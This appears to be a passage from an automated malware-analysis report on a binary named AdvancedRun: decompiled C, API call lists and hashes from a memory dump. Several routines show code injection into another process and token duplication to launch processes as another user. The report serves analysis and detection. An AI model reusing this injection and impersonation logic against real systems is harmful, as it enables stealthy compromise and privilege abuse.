                                                                                                                                                                                                                          					_t126 = 0x11;
                                                                                                                                                                                                                          					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                                                                                                                                          					_t148 = _t148 + 0xc;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v33420 = 0x44;
                                                                                                                                                                                                                          				if(_a16 == 0) {
                                                                                                                                                                                                                          					_v33336 = 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404923(0x2000,  &_v33336, _a16);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a12 == 0) {
                                                                                                                                                                                                                          					_v16950 = 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404923(0x2000,  &_v16950, _a12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a24 == 0) {
                                                                                                                                                                                                                          					_v564 = 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					E00404923(0x104,  &_v564, _a24);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v24 = _a20;
                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                          				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                                                                                                                                          				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                                                                                                                                          				_a12 = _t90;
                                                                                                                                                                                                                          				if(_a16 == 0 || _t90 == 0) {
		*_a4 = GetLastError();
	} else {
		WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
		WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
		_v20 = 0;
		_v16 = 0;
		_a24 = 0;
		_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
		_a28 = _t144;
		if(_t144 == 0) {
			*_a4 = GetLastError();
		} else {
			ResumeThread(_t144);
			WaitForSingleObject(_t144, 0x7d0);
			CloseHandle(_t144);
		}
		_v66852 = 0;
		memset( &_v66848, 0, 0x8284);
		ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
		VirtualFreeEx(_a8, _a16, 0, 0x8000);
		VirtualFreeEx(_a8, _a12, 0, 0x8000);
		if(_a28 != 0) {
			*_a4 = _v66756;
			_v12 = _v66760;
			if(_a32 != 0) {
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
			}
		}
		if(_v20 != 0) {
			FreeLibrary(_v20);
		}
	}
	goto L30;
}

APIs
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
• memset.MSVCRT ref: 0040A4B3
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
• GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
• GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
• VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
• VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
• WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
• WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
• ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A66E
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                                                                                                                          • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                                                                                                                          • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1572607441-20550370
                                                                                                                                                                                                                          • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040289F(intOrPtr* __esi) {
                                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t10;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *(__esi + 0x10) == 0) {
                                                                                                                                                                                                                          					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                                                                                                                                          					 *(__esi + 0x10) = _t10;
                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                                                                                                                                          					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                                                                                                                                          					 *(__esi + 8) = _t14;
                                                                                                                                                                                                                          					return _t14;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t9;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                          • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                                                                                                                          • API String ID: 2238633743-1970996977
                                                                                                                                                                                                                          • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				char* _v20;
                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                                                                          				void _v44;
                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                          				struct _OSVERSIONINFOW _v328;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                          				intOrPtr* _t44;
                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t54;
                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t54 = __eax;
                                                                                                                                                                                                                          				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                                                                                                                                          				GetVersionExW( &_v328);
                                                                                                                                                                                                                          				if(_v328.dwMajorVersion < 6) {
                                                                                                                                                                                                                          					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E0040A1EF(_t54);
                                                                                                                                                                                                                          				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                                                                          				if(_t44 != 0) {
                                                                                                                                                                                                                          					_t55 = 8;
                                                                                                                                                                                                                          					memset( &_v44, 0, _t55 << 2);
                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                          					asm("stosd");
                                                                                                                                                                                                                          					_v36 =  &_v12;
                                                                                                                                                                                                                          					_v20 =  &_v52;
                                                                                                                                                                                                                          					_v48 = 0x24;
                                                                                                                                                                                                                          					_v44 = 0x10003;
                                                                                                                                                                                                                          					_v40 = _t55;
                                                                                                                                                                                                                          					_v28 = 0x10004;
                                                                                                                                                                                                                          					_v24 = 4;
                                                                                                                                                                                                                          					_a16 = 0;
                                                                                                                                                                                                                          					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                          					return  !( ~_t40) & _a16;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                                                                                                                          • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                                                                            • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 283512611-3993045852
                                                                                                                                                                                                                          • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                                                                                                                          				struct tagPOINT _v12;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                                          				struct HBRUSH__* _t56;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          				unsigned int _t63;
                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                          				struct HWND__* _t69;
                                                                                                                                                                                                                          				struct HWND__* _t70;
                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                          				unsigned int _t74;
                                                                                                                                                                                                                          				struct HWND__* _t76;
                                                                                                                                                                                                                          				struct HWND__* _t77;
                                                                                                                                                                                                                          				struct HWND__* _t78;
                                                                                                                                                                                                                          				struct HWND__* _t79;
                                                                                                                                                                                                                          				unsigned int _t85;
                                                                                                                                                                                                                          				struct HWND__* _t87;
                                                                                                                                                                                                                          				struct HWND__* _t89;
                                                                                                                                                                                                                          				struct HWND__* _t90;
                                                                                                                                                                                                                          				struct tagPOINT _t96;
                                                                                                                                                                                                                          				struct tagPOINT _t98;
                                                                                                                                                                                                                          				signed short _t103;
                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t106 = __edx;
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_t47 = _a4 - 0x110;
                                                                                                                                                                                                                          				_t117 = __ecx;
                                                                                                                                                                                                                          				if(_t47 == 0) {
                                                                                                                                                                                                                          					__eflags =  *0x40feb0;
                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                          						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                                                                                                                          						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                                                                                                                                          					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                                                                                                                          					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                                                                                                                          					E0040103E(_t117, __eflags);
                                                                                                                                                                                                                          					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                                                                                                                                          					goto L30;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t61 = _t47 - 1;
                                                                                                                                                                                                                          					if(_t61 == 0) {
                                                                                                                                                                                                                          						_t103 = _a8;
                                                                                                                                                                                                                          						_t63 = _t103 >> 0x10;
                                                                                                                                                                                                                          						__eflags = _t103 - 1;
                                                                                                                                                                                                                          						if(_t103 == 1) {
                                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                                          							__eflags = _t63;
                                                                                                                                                                                                                          							if(_t63 != 0) {
                                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                                                                                                                          								DeleteObject( *(_t117 + 0x43c));
                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							__eflags = _t103 - 2;
                                                                                                                                                                                                                          							if(_t103 != 2) {
                                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								goto L24;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t68 = _t61 - 0x27;
                                                                                                                                                                                                                          						if(_t68 == 0) {
                                                                                                                                                                                                                          							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                                                                          							__eflags = _a12 - _t69;
                                                                                                                                                                                                                          							if(_a12 != _t69) {
                                                                                                                                                                                                                          								__eflags =  *0x40ff30;
                                                                                                                                                                                                                          								if( *0x40ff30 == 0) {
                                                                                                                                                                                                                          									goto L30;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                                                                          									__eflags = _a12 - _t70;
                                                                                                                                                                                                                          									if(_a12 != _t70) {
                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                                          								SetBkMode(_a8, 1);
                                                                                                                                                                                                                          								SetTextColor(_a8, 0xc00000);
                                                                                                                                                                                                                          								_t56 = GetSysColorBrush(0xf);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t73 = _t68 - 0xc8;
                                                                                                                                                                                                                          							if(_t73 == 0) {
                                                                                                                                                                                                                          								_t74 = _a12;
                                                                                                                                                                                                                          								_t96 = _t74 & 0x0000ffff;
                                                                                                                                                                                                                          								_v12.x = _t96;
                                                                                                                                                                                                                          								_v12.y = _t74 >> 0x10;
                                                                                                                                                                                                                          								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                                                                          								_push(_v12.y);
                                                                                                                                                                                                                          								_a8 = _t76;
                                                                                                                                                                                                                          								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                                                                                                                          								__eflags = _t77 - _a8;
                                                                                                                                                                                                                          								if(_t77 != _a8) {
                                                                                                                                                                                                                          									__eflags =  *0x40ff30;
                                                                                                                                                                                                                          									if( *0x40ff30 == 0) {
                                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                                                                          										_push(_v12.y);
                                                                                                                                                                                                                          										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                                                                                                                          										__eflags = _t79 - _t78;
                                                                                                                                                                                                                          										if(_t79 != _t78) {
                                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                          											goto L13;
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									L13:
                                                                                                                                                                                                                          									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								if(_t73 != 0) {
                                                                                                                                                                                                                          									L30:
                                                                                                                                                                                                                          									_t56 = 0;
                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_t85 = _a12;
                                                                                                                                                                                                                          									_t98 = _t85 & 0x0000ffff;
                                                                                                                                                                                                                          									_v12.x = _t98;
                                                                                                                                                                                                                          									_v12.y = _t85 >> 0x10;
                                                                                                                                                                                                                          									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                                                                                          									_push(_v12.y);
                                                                                                                                                                                                                          									_a8 = _t87;
                                                                                                                                                                                                                          									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                                                                                                                          										__eflags =  *0x40ff30;
                                                                                                                                                                                                                          										if( *0x40ff30 == 0) {
                                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                          											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                                                                                          											_push(_v12.y);
                                                                                                                                                                                                                          											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                                                                                                                          											__eflags = _t90 - _t89;
                                                                                                                                                                                                                          											if(_t90 != _t89) {
                                                                                                                                                                                                                          												goto L30;
                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                          												_push(0x40ff30);
                                                                                                                                                                                                                          												goto L7;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_push(_t117 + 0x23e);
                                                                                                                                                                                                                          										L7:
                                                                                                                                                                                                                          										_push( *(_t117 + 0x10));
                                                                                                                                                                                                                          										E00404F7E();
                                                                                                                                                                                                                          										L8:
                                                                                                                                                                                                                          										_t56 = 1;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t56;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          0x004011e1
                                                                                                                                                                                                                          0x004011e3
                                                                                                                                                                                                                          0x004011e6
                                                                                                                                                                                                                          0x0040120e
                                                                                                                                                                                                                          0x00401216
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040121c
                                                                                                                                                                                                                          0x00401224
                                                                                                                                                                                                                          0x00401226
                                                                                                                                                                                                                          0x00401229
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040122f
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040122f
                                                                                                                                                                                                                          0x00401229
                                                                                                                                                                                                                          0x004011e8
                                                                                                                                                                                                                          0x004011e8
                                                                                                                                                                                                                          0x004011ed
                                                                                                                                                                                                                          0x004011fb
                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                          0x00401151
                                                                                                                                                                                                                          0x0040115a
                                                                                                                                                                                                                          0x00401168
                                                                                                                                                                                                                          0x0040116b
                                                                                                                                                                                                                          0x0040116e
                                                                                                                                                                                                                          0x00401170
                                                                                                                                                                                                                          0x00401173
                                                                                                                                                                                                                          0x00401180
                                                                                                                                                                                                                          0x00401182
                                                                                                                                                                                                                          0x00401185
                                                                                                                                                                                                                          0x004011a4
                                                                                                                                                                                                                          0x004011ac
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011b2
                                                                                                                                                                                                                          0x004011ba
                                                                                                                                                                                                                          0x004011bc
                                                                                                                                                                                                                          0x004011c7
                                                                                                                                                                                                                          0x004011c9
                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011d1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011d1
                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                          0x00401187
                                                                                                                                                                                                                          0x00401187
                                                                                                                                                                                                                          0x00401199
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401199
                                                                                                                                                                                                                          0x004010c6
                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004010ce
                                                                                                                                                                                                                          0x004010ce
                                                                                                                                                                                                                          0x004010d7
                                                                                                                                                                                                                          0x004010e5
                                                                                                                                                                                                                          0x004010e8
                                                                                                                                                                                                                          0x004010eb
                                                                                                                                                                                                                          0x004010ed
                                                                                                                                                                                                                          0x004010f0
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x0040111d
                                                                                                                                                                                                                          0x00401125
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040112b
                                                                                                                                                                                                                          0x00401133
                                                                                                                                                                                                                          0x00401135
                                                                                                                                                                                                                          0x00401140
                                                                                                                                                                                                                          0x00401142
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00401104
                                                                                                                                                                                                                          0x0040110a
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110e
                                                                                                                                                                                                                          0x00401115
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                          0x004010b5
                                                                                                                                                                                                                          0x004010ac
                                                                                                                                                                                                                          0x00401303

Memory Dump Source
• Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                          • String ID: AdvancedRun
                                                                                                                                                                                                                          • API String ID: 829165378-481304740
                                                                                                                                                                                                                          • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                                                                                                                          				void _v259;
                                                                                                                                                                                                                          				void _v260;
                                                                                                                                                                                                                          				void _v515;
                                                                                                                                                                                                                          				void _v516;
                                                                                                                                                                                                                          				char _v1048;
                                                                                                                                                                                                                          				void _v1052;
                                                                                                                                                                                                                          				void _v1056;
                                                                                                                                                                                                                          				void _v1560;
                                                                                                                                                                                                                          				long _v1580;
                                                                                                                                                                                                                          				void _v3626;
